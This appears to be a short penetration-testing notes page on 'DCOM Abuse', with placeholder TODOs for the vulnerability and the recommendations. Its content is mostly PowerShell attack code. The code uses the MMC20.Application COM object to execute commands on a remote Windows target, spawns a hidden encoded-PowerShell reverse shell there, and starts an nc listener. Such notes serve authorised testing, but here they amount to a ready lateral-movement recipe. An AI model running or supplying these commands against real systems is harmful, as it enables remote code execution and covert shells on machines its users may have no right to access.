DCOM Abuse
Table of contents
Vulnerability
TODO: Describe the vulnerability here.
Prerequisites
- Local administrator rights on the target machine.
Exploit
From an elevated PowerShell prompt.
# Instanciate Microsoft Management Console on remote target.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","$target"))
# Execute remote command
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c $command","7")
Similar to WinRM Abuse, you can spawn a reverse shell on the target machine.
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e $payload","7")
Don’t forget to run your listener first.
nc -lnvp $lport
Recommendations
- TODO: List recommendations here.